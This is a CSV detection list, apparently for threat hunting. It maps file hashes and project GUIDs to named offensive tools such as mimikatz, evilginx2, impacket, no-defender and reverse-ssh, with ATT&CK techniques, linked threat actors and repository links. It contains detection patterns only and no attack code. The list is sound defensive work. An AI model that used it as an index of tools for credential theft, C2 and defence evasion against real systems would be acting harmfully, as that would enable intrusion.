"*58d82bca11a41a01d0ddfa7d105e6a48*",".{0,1000}58d82bca11a41a01d0ddfa7d105e6a48.{0,1000}","offensive_tool_keyword","iodine","iodine. iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","EMBER BEAR","C2","https://github.com/yarrick/iodine","1","0","#filehash","N/A","10","10","6413","524","2025-04-08T17:44:12Z","2012-02-04T19:51:39Z","27156"
"*58d9516f4e361b773e8638c802e7d0bcc716d1c750d7306764062394fc129983*",".{0,1000}58d9516f4e361b773e8638c802e7d0bcc716d1c750d7306764062394fc129983.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","27157"
"*58de3ab6935d1248e937e333e917586efb058e8b7d65ade38989543c806bd23e*",".{0,1000}58de3ab6935d1248e937e333e917586efb058e8b7d65ade38989543c806bd23e.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","27158"
"*58de3ab6935d1248e937e333e917586efb058e8b7d65ade38989543c806bd23e*",".{0,1000}58de3ab6935d1248e937e333e917586efb058e8b7d65ade38989543c806bd23e.{0,1000}","offensive_tool_keyword","Telemetry","Abusing Windows Telemetry for persistence through registry modifications and scheduled tasks to execute arbitrary commands with system-level privileges.","T1053 - T1547 - T1059","TA0003 - TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/Imanfeng/Telemetry","1","0","#filehash","N/A","9","2","140","13","2020-07-02T09:41:27Z","2020-06-24T16:30:44Z","27159"
"*58ec2f3cc5cbbcf8add01a0f5f7c8331d830b7944a1031788a5afe4a70ec0a3d*",".{0,1000}58ec2f3cc5cbbcf8add01a0f5f7c8331d830b7944a1031788a5afe4a70ec0a3d.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","27160"
"*58f9c5248fa5a9cc64622cc12e3963690eed691cd16cbdf5506d5328cfb41f69*",".{0,1000}58f9c5248fa5a9cc64622cc12e3963690eed691cd16cbdf5506d5328cfb41f69.{0,1000}","offensive_tool_keyword","pwnlook","An offensive postexploitation tool that will give you complete control over the Outlook desktop application and therefore to the emails configured in it","T1114 - T1071 - T1059 - T1113 - T1123","TA0002 - TA0005 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/amjcyber/pwnlook","1","0","#filehash","N/A","6","2","166","18","2024-10-09T07:50:04Z","2024-09-19T10:26:16Z","27163"
"*58fcbf640b58a45f2fed22fdd70c5d73ae781274927a2def5f71cb3e4ce02a15*",".{0,1000}58fcbf640b58a45f2fed22fdd70c5d73ae781274927a2def5f71cb3e4ce02a15.{0,1000}","offensive_tool_keyword","Termite","Termite rootit abused by threat actors","T1014 - T1069 - T1055","TA0005 - TA0003 - TA0004","Operation TunnelSnake","Whitefly","Persistence","https://github.com/rootkiter/Binary-files/tree/212c43b40e2e4c2e2703400caaa732557b6080a4","1","0","#filehash","N/A","10","10","156","177","2021-01-26T23:16:49Z","2019-01-03T05:01:20Z","27164"
"*58fcbf640b58a45f2fed22fdd70c5d73ae781274927a2def5f71cb3e4ce02a15*",".{0,1000}58fcbf640b58a45f2fed22fdd70c5d73ae781274927a2def5f71cb3e4ce02a15.{0,1000}","offensive_tool_keyword","Termite","Termite rootit abused by threat actors","T1014 - T1069 - T1055","TA0005 - TA0003 - TA0004","Operation TunnelSnake","Whitefly","Persistence","https://github.com/rootkiter/Binary-files/tree/212c43b40e2e4c2e2703400caaa732557b6080a4","1","0","#filehash","N/A","10","10","156","177","2021-01-26T23:16:49Z","2019-01-03T05:01:20Z","27165"
"*5900fc96f25ad0d41cbed1bb7b0f38bde26e0ebebc290f1a294ffedeb1d68b83*",".{0,1000}5900fc96f25ad0d41cbed1bb7b0f38bde26e0ebebc290f1a294ffedeb1d68b83.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","#filehash","N/A","10","10","961","141","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z","27166"
"*5905bf979bb3d714c2641502161d807723fc79cfc9b58cbe2a95882f12623778*",".{0,1000}5905bf979bb3d714c2641502161d807723fc79cfc9b58cbe2a95882f12623778.{0,1000}","offensive_tool_keyword","Gato-X","automate advanced enumeration and exploitation techniques against GitHub repositories and organizations","T1190 - T1083 - T1588 - T1587","TA0001 - TA0007 - TA0005","N/A","N/A","Reconnaissance","https://github.com/adnanekhan/Gato-X","1","0","#filehash","N/A","7","3","270","35","2025-04-21T17:57:09Z","2024-01-27T18:55:16Z","27168"
"*590cdf2dfb21bf5ee5fcdfe1f37bd530cbd946cfcc43f8e644638486b06cdc18*",".{0,1000}590cdf2dfb21bf5ee5fcdfe1f37bd530cbd946cfcc43f8e644638486b06cdc18.{0,1000}","offensive_tool_keyword","mythic","Thanatos is a Windows and Linux C2 agent written in rust.","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/thanatos","1","0","#filehash","N/A","10","10","333","49","2024-12-19T19:07:03Z","2022-03-07T20:35:33Z","27169"
"*590e6b85b7ae5a1572103332c6cc9494a13c65d33e839b3316704fe79c998f65*",".{0,1000}590e6b85b7ae5a1572103332c6cc9494a13c65d33e839b3316704fe79c998f65.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","27171"
"*591034aa486803adc5b5d4df97d915db89616810ceac4569761e30190f8615ac*",".{0,1000}591034aa486803adc5b5d4df97d915db89616810ceac4569761e30190f8615ac.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","27172"
"*59156b50c20d44f8757a3a53ebaf4f515b8eb86802ee51085ace7b1f714406ce*",".{0,1000}59156b50c20d44f8757a3a53ebaf4f515b8eb86802ee51085ace7b1f714406ce.{0,1000}","offensive_tool_keyword","Carseat","Python implementation of GhostPack Seatbelt situational awareness tool","T1012 - T1082 - T1087 - T1124 - T1217","TA0006 - TA0007 - TA0009","N/A","N/A","Collection","https://github.com/0xthirteen/Carseat","1","0","#filehash","N/A","8","3","257","21","2024-11-12T19:37:38Z","2024-11-08T02:08:53Z","27173"
"*591c23bad87621b0cf6f2e5f27f038205e11a9241f83ab28bbafed575d8fd6b6*",".{0,1000}591c23bad87621b0cf6f2e5f27f038205e11a9241f83ab28bbafed575d8fd6b6.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","27174"
"*59224C16-39C5-49EA-8525-F493DC1D66FE*",".{0,1000}59224C16\-39C5\-49EA\-8525\-F493DC1D66FE.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","#GUIDproject","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","27175"
"*592357cfeb7bbc10865d9e64e4b778bd742a6abb452166e9f9b1eef404f67a31*",".{0,1000}592357cfeb7bbc10865d9e64e4b778bd742a6abb452166e9f9b1eef404f67a31.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","27176"
"*592357cfeb7bbc10865d9e64e4b778bd742a6abb452166e9f9b1eef404f67a31*",".{0,1000}592357cfeb7bbc10865d9e64e4b778bd742a6abb452166e9f9b1eef404f67a31.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","27177"
"*59395105f688ef8c35cf2061928c2cb7f2f5d748518ca9ebfa5ee14a2461915e*",".{0,1000}59395105f688ef8c35cf2061928c2cb7f2f5d748518ca9ebfa5ee14a2461915e.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","27178"
"*594199ae0a6e125642f438b9b09af03d2ba269259db213fdba7901b5589f2234*",".{0,1000}594199ae0a6e125642f438b9b09af03d2ba269259db213fdba7901b5589f2234.{0,1000}","offensive_tool_keyword","no_defender","disable windows defender. (through the WSC api)","T1089","TA0005","N/A","Black Basta","Defense Evasion","https://github.com/es3n1n/no-defender","1","0","#filehash","N/A","10","10","1907","13","2024-06-08T01:29:18Z","2024-05-23T05:18:38Z","27179"
"*5943462569081cec86ed241964fbccf91b4be608c2d647470b19afe31549adc5*",".{0,1000}5943462569081cec86ed241964fbccf91b4be608c2d647470b19afe31549adc5.{0,1000}","offensive_tool_keyword","Carseat","Python implementation of GhostPack Seatbelt situational awareness tool","T1012 - T1082 - T1087 - T1124 - T1217","TA0006 - TA0007 - TA0009","N/A","N/A","Collection","https://github.com/0xthirteen/Carseat","1","0","#filehash","N/A","8","3","257","21","2024-11-12T19:37:38Z","2024-11-08T02:08:53Z","27180"
"*5943c0cb2c044eb24b14969bd9b07c3c0edab83446fb9bc8188cc896f218a065*",".{0,1000}5943c0cb2c044eb24b14969bd9b07c3c0edab83446fb9bc8188cc896f218a065.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","27181"
"*594811dafdfb9f5cc56b604d8fe97777c23057e37803ec34afdf5680bf9276ea*",".{0,1000}594811dafdfb9f5cc56b604d8fe97777c23057e37803ec34afdf5680bf9276ea.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","27182"
"*5952e312083c8121c4856b566421aa23afe427e7f1eb0b4e6ae34515b906705a*",".{0,1000}5952e312083c8121c4856b566421aa23afe427e7f1eb0b4e6ae34515b906705a.{0,1000}","offensive_tool_keyword","RottenPotatoNG","perform the RottenPotato attack and get a handle to a privileged token","T1134.001 - T1055.012 - T1547.001","TA0004","N/A","Sandworm","Privilege Escalation","https://github.com/breenmachine/RottenPotatoNG","1","0","#filehash","N/A","8","10","935","183","2017-12-29T14:38:47Z","2017-12-29T13:19:03Z","27184"
"*5953a5d8fda1ee62fad196cafa1183abf11bb5555b9b534756e98a0314411513*",".{0,1000}5953a5d8fda1ee62fad196cafa1183abf11bb5555b9b534756e98a0314411513.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","27185"
"*595a77ddfb6f674bd5bc1c297ae912f5ebf6ba218a2f857ff46b7b37d1a9678b*",".{0,1000}595a77ddfb6f674bd5bc1c297ae912f5ebf6ba218a2f857ff46b7b37d1a9678b.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/kgretzky/evilginx2","1","0","#filehash","N/A","10","10","12879","2234","2025-01-21T15:16:19Z","2018-07-10T09:59:52Z","27188"
"*595D5812-AA30-4EDE-95DA-8EDD7B8844BD*",".{0,1000}595D5812\-AA30\-4EDE\-95DA\-8EDD7B8844BD.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","#GUIDproject","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","27189"
"*596481231C2187836E29D3AA4498211393C5A31FB762548D4415673CB9D21797*",".{0,1000}596481231C2187836E29D3AA4498211393C5A31FB762548D4415673CB9D21797.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","#filehash","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","27191"
"*596f3d75d96f68ee6e91c6c5ec4180b6277b6f067e6fe233193c2f75dc554e8b*",".{0,1000}596f3d75d96f68ee6e91c6c5ec4180b6277b6f067e6fe233193c2f75dc554e8b.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","27192"
"*5978136ED7A5A34BD587D5D9B7E405560461B166983B94897DF0BD85434653EB*",".{0,1000}5978136ED7A5A34BD587D5D9B7E405560461B166983B94897DF0BD85434653EB.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","0","#filehash","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","27193"
"*597f9482c4e355cb665fbd02bde2b59133e1a364744cbb41207c68e1bd7fe3c6*",".{0,1000}597f9482c4e355cb665fbd02bde2b59133e1a364744cbb41207c68e1bd7fe3c6.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","27194"
"*598021ca986287a82e8baa6e77bdc089d91fdfbe75da3c8dc7e105a112477eec*",".{0,1000}598021ca986287a82e8baa6e77bdc089d91fdfbe75da3c8dc7e105a112477eec.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","27195"
"*59852690cccde0f1853f60abfa889899a940a43c45a4906963a52e0069b02480*",".{0,1000}59852690cccde0f1853f60abfa889899a940a43c45a4906963a52e0069b02480.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","27196"
"*598555a7e053c7456ee8a06a892309386e69d473c73284de9bbc0ba73b17e70a*",".{0,1000}598555a7e053c7456ee8a06a892309386e69d473c73284de9bbc0ba73b17e70a.{0,1000}","offensive_tool_keyword","dialupass","This utility enumerates all dialup/VPN entries on your computers. and displays their logon details: User Name. Password. and Domain. You can use it to recover a lost password of your Internet connection or VPN.","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","BlackSuit - Royal - GoGoogle","Credential Access","https://www.nirsoft.net/utils/dialupass.html","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","27197"
"*59875ad922a551d9831d93e54c731399803a814f95a766ef920aef69441564f9*",".{0,1000}59875ad922a551d9831d93e54c731399803a814f95a766ef920aef69441564f9.{0,1000}","offensive_tool_keyword","Eventlogedit-evtx--Evolution","","T1070.001 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/3gstudent/Eventlogedit-evtx--Evolution","1","0","#filehash","N/A","9","3","267","62","2021-04-17T01:28:00Z","2018-06-05T01:21:20Z","27198"
"*598f347942f32d2f22b6d95d78f3b92529f7cc6e7b6ca2fb083e118810f8c6ab*",".{0,1000}598f347942f32d2f22b6d95d78f3b92529f7cc6e7b6ca2fb083e118810f8c6ab.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","27199"
"*599540abb0ae7954cd087c212457c9b3d17afad00926b27bbfa8538d3d580912*",".{0,1000}599540abb0ae7954cd087c212457c9b3d17afad00926b27bbfa8538d3d580912.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","#filehash","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","27200"
"*599b1b33ce473c83abfbef38d7fbc7108bd694004047832559ad3d9c83857aba*",".{0,1000}599b1b33ce473c83abfbef38d7fbc7108bd694004047832559ad3d9c83857aba.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","27201"
"*59a64374f430585117c385edce4ac8ff536cb2710a0037384f9f869601752af1*",".{0,1000}59a64374f430585117c385edce4ac8ff536cb2710a0037384f9f869601752af1.{0,1000}","offensive_tool_keyword","logon_backdoor","automated sticky keys backdoor","T1174 - T1078 - T1546.013","TA0003","N/A","N/A","Persistence","https://github.com/szymon1118/logon_backdoor","1","0","#filehash","N/A","6","1","10","4","2016-02-12T11:42:59Z","2016-02-10T22:38:46Z","27202"
"*59a95d191e08984a19d6fca6b65078e372c327624605b68e9c527205eaf455e5*",".{0,1000}59a95d191e08984a19d6fca6b65078e372c327624605b68e9c527205eaf455e5.{0,1000}","offensive_tool_keyword","DRSAT","Disconnected RSAT is a launcher for the official Group Policy Manager - Certificate Authority and Certificate Templates snap-in to bypass the domain joined requirement that is needed when using the official MMC snap-in. The tool works by injecting a C# library into MMC that will hook the various API calls to trick MMC into believing that the logged on user is a domain user. attackers can abuse Disconnected RSAT to interact with Active Directory (AD) environments from non-domain-joined machines","T1559.001 - T1112 - T1078 - T1134.002 - T1055.001","TA0002 - TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/CCob/DRSAT","1","0","#filehash","N/A","6","3","233","25","2024-12-27T11:44:18Z","2024-09-04T16:35:02Z","27203"
"*59aa09cb628399ea3c2a900cb391238cea0bbe9083868f9fcfa4c13dcbf0b702*",".{0,1000}59aa09cb628399ea3c2a900cb391238cea0bbe9083868f9fcfa4c13dcbf0b702.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","#filehash","N/A","10","10","961","141","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z","27204"
"*59b6bf3d2292e532ee31d4a56b4812671eb90cde840c356ac396df3e2b03fa3a*",".{0,1000}59b6bf3d2292e532ee31d4a56b4812671eb90cde840c356ac396df3e2b03fa3a.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","27206"
"*59c03a973a4c6ad7327812d568a8bcdd9c21af006853ce459014183bef699a24*",".{0,1000}59c03a973a4c6ad7327812d568a8bcdd9c21af006853ce459014183bef699a24.{0,1000}","offensive_tool_keyword","ShellGen","PowerShell script to generate ShellCode in various formats","T1059.001 - T1588","TA0042","N/A","N/A","Resource Development","https://github.com/Leo4j/ShellGen","1","0","#filehash","N/A","7","1","41","10","2024-09-25T09:29:13Z","2024-08-22T13:32:06Z","27208"
